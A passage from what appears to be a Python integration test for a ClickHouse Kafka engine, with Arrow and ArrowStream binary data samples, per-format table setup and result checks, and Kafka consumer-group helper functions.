0\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x
3f\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
b'\x41\x52\x52\x4f\x57\x31\x00\x00\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x
00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x10\x00\x00\x00\x0c\x00\x14\x00\x06\x00\x08\x00\x0c\x00\x10\x00\x0c\x00\x00\x00\x00\x00\x03\x00\x3c\x00\x00\x00\x28\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x58\x01\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x
00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\x78\x01\x00\x00\x41\x52\x52\x4f\x57\x31',
],
},
'ArrowStream' : {
'data_sample' : [
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x48\x01\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x98\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\xd8\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf8\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x38\x01\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x0f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x04\x00\x00\x00\x06\x00\x00\x00\x08\x00\x00\x00\x0a\x00\x00\x00\x0c\x00\x00\x00\x0e\x00\x00\x00\x10\x00\x00\x00\x12\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x18\x00\x00\x00\x1a\x00\x00\x00\x1c\x00\x00\x00\x1e\x00\x00\x00\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x41\x4d\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x3f\x00\x00\x00\x
00\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x00\xff\xff\xff\xff\x00\x00\x00\x00',
b'\xff\xff\xff\xff\x48\x01\x00\x00\x10\x00\x00\x00\x00\x00\x0a\x00\x0c\x00\x06\x00\x05\x00\x08\x00\x0a\x00\x00\x00\x00\x01\x03\x00\x0c\x00\x00\x00\x08\x00\x08\x00\x00\x00\x04\x00\x08\x00\x00\x00\x04\x00\x00\x00\x05\x00\x00\x00\xe4\x00\x00\x00\x9c\x00\x00\x00\x6c\x00\x00\x00\x34\x00\x00\x00\x04\x00\x00\x00\x40\xff\xff\xff\x00\x00\x00\x02\x18\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x72\xff\xff\xff\x08\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x33\x00\x00\x00\x00\x6c\xff\xff\xff\x00\x00\x00\x03\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x06\x00\x06\x00\x00\x00\x00\x00\x01\x00\x04\x00\x00\x00\x76\x61\x6c\x32\x00\x00\x00\x00\xa0\xff\xff\xff\x00\x00\x00\x05\x18\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x04\x00\x04\x00\x00\x00\x04\x00\x00\x00\x76\x61\x6c\x31\x00\x00\x00\x00\xcc\xff\xff\xff\x00\x00\x00\x02\x20\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x08\x00\x04\x00\x06\x00\x00\x00\x10\x00\x00\x00\x07\x00\x00\x00\x62\x6c\x6f\x63\x6b\x4e\x6f\x00\x10\x00\x14\x00\x08\x00\x00\x00\x07\x00\x0c\x00\x00\x00\x10\x00\x10\x00\x00\x00\x00\x00\x00\x02\x24\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x08\x00\x0c\x00\x08\x00\x07\x00\x08\x00\x00\x00\x00\x00\x00\x01\x40\x00\x00\x00\x02\x00\x00\x00\x69\x64\x00\x00\xff\xff\xff\xff\x58\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x16\x00\x06\x00\x05\x00\x08\x00\x0c\x00\x0c\x00\x00\x00\x00\x03\x03\x00\x18\x00\x00\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0a\x00\x18\x00\x0c\x00\x04\x00\x08\x00\x0a\x00\x00\x00\xcc\x00\x00\x00\x10\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x
00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x41\x4d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x3f\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00',
],
},
}
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Set up {}'.format(format_name)))
topic_name = 'format_tests_{}'.format(format_name)
data_sample = format_opts['data_sample']
data_prefix = []
# prepend empty value when supported
if format_opts.get('supports_empty_value', False):
data_prefix = data_prefix + ['']
kafka_produce(kafka_cluster, topic_name, data_prefix + data_sample)
instance.query('''
DROP TABLE IF EXISTS test.kafka_{format_name};
CREATE TABLE test.kafka_{format_name} (
id Int64,
blockNo UInt16,
val1 String,
val2 Float32,
val3 UInt8
) ENGINE = Kafka()
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = '{topic_name}',
kafka_group_name = '{topic_name}_group',
kafka_format = '{format_name}',
kafka_flush_interval_ms = 1000 {extra_settings};
DROP TABLE IF EXISTS test.kafka_{format_name}_mv;
CREATE MATERIALIZED VIEW test.kafka_{format_name}_mv Engine=Log AS
SELECT *, _topic, _partition, _offset FROM test.kafka_{format_name};
'''.format(topic_name=topic_name, format_name=format_name,
extra_settings=format_opts.get('extra_settings') or ''))
instance.wait_for_log_line('kafka.*Committed offset [0-9]+.*format_tests_', repetitions=len(all_formats.keys()), look_behind_lines=12000)
for format_name, format_opts in list(all_formats.items()):
logging.debug(('Checking {}'.format(format_name)))
topic_name = f'format_tests_{format_name}'
# shift offsets by 1 if format supports empty value
offsets = [1, 2, 3] if format_opts.get('supports_empty_value', False) else [0, 1, 2]
result = instance.query('SELECT * FROM test.kafka_{format_name}_mv;'.format(format_name=format_name))
expected = '''\
0 0 AM 0.5 1 {topic_name} 0 {offset_0}
1 0 AM 0.5 1 {topic_name} 0 {offset_1}
2 0 AM 0.5 1 {topic_name} 0 {offset_1}
3 0 AM 0.5 1 {topic_name} 0 {offset_1}
4 0 AM 0.5 1 {topic_name} 0 {offset_1}
5 0 AM 0.5 1 {topic_name} 0 {offset_1}
6 0 AM 0.5 1 {topic_name} 0 {offset_1}
7 0 AM 0.5 1 {topic_name} 0 {offset_1}
8 0 AM 0.5 1 {topic_name} 0 {offset_1}
9 0 AM 0.5 1 {topic_name} 0 {offset_1}
10 0 AM 0.5 1 {topic_name} 0 {offset_1}
11 0 AM 0.5 1 {topic_name} 0 {offset_1}
12 0 AM 0.5 1 {topic_name} 0 {offset_1}
13 0 AM 0.5 1 {topic_name} 0 {offset_1}
14 0 AM 0.5 1 {topic_name} 0 {offset_1}
15 0 AM 0.5 1 {topic_name} 0 {offset_1}
0 0 AM 0.5 1 {topic_name} 0 {offset_2}
'''.format(topic_name=topic_name, offset_0=offsets[0], offset_1=offsets[1], offset_2=offsets[2])
assert TSV(result) == TSV(expected), 'Proper result for format: {}'.format(format_name)
kafka_delete_topic(admin_client, topic_name)
# Since everything is async and shaky when receiving messages from Kafka,
# we may want to try and check results multiple times in a loop.
def kafka_check_result(result, check=False, ref_file='test_kafka_json.reference'):
    """Compare *result* against a TSV reference file shipped with the tests.

    With ``check=False`` (default) return a boolean, suitable for polling
    loops; with ``check=True`` assert equality so pytest reports a diff.
    """
    reference_path = p.join(p.dirname(__file__), ref_file)
    with open(reference_path) as reference:
        if not check:
            return TSV(result) == TSV(reference)
        assert TSV(result) == TSV(reference)
def decode_avro(message):
    """Render every record of an Avro datafile (given as bytes) as text,
    one ``print``-formatted record per line."""
    reader = avro.datafile.DataFileReader(io.BytesIO(message), avro.io.DatumReader())
    rendered = io.StringIO()
    for record in reader:
        print(record, file=rendered)
    return rendered.getvalue()
# https://stackoverflow.com/a/57692111/1555175
def describe_consumer_group(kafka_cluster, name):
    """Describe consumer group *name* via a raw broker connection.

    Returns a list of dicts, one per group member, with keys ``member_id``,
    ``client_id``, ``client_host`` and ``assignment`` (a list of
    ``{'topic': ..., 'partitions': ...}`` entries decoded from the member's
    binary assignment blob).
    """
    client = BrokerConnection('localhost', kafka_cluster.kafka_port, socket.AF_INET)
    client.connect_blocking()
    try:
        list_members_in_groups = DescribeGroupsRequest_v1(groups=[name])
        future = client.send(list_members_in_groups)
        # Pump the connection until the broker answers the describe request.
        while not future.is_done:
            for resp, f in client.recv():
                f.success(resp)
        (error_code, group_id, state, protocol_type, protocol, members) = future.value.groups[0]

        res = []
        for member in members:
            (member_id, client_id, client_host, member_metadata, member_assignment) = member
            member_info = {}
            member_info['member_id'] = member_id
            member_info['client_id'] = client_id
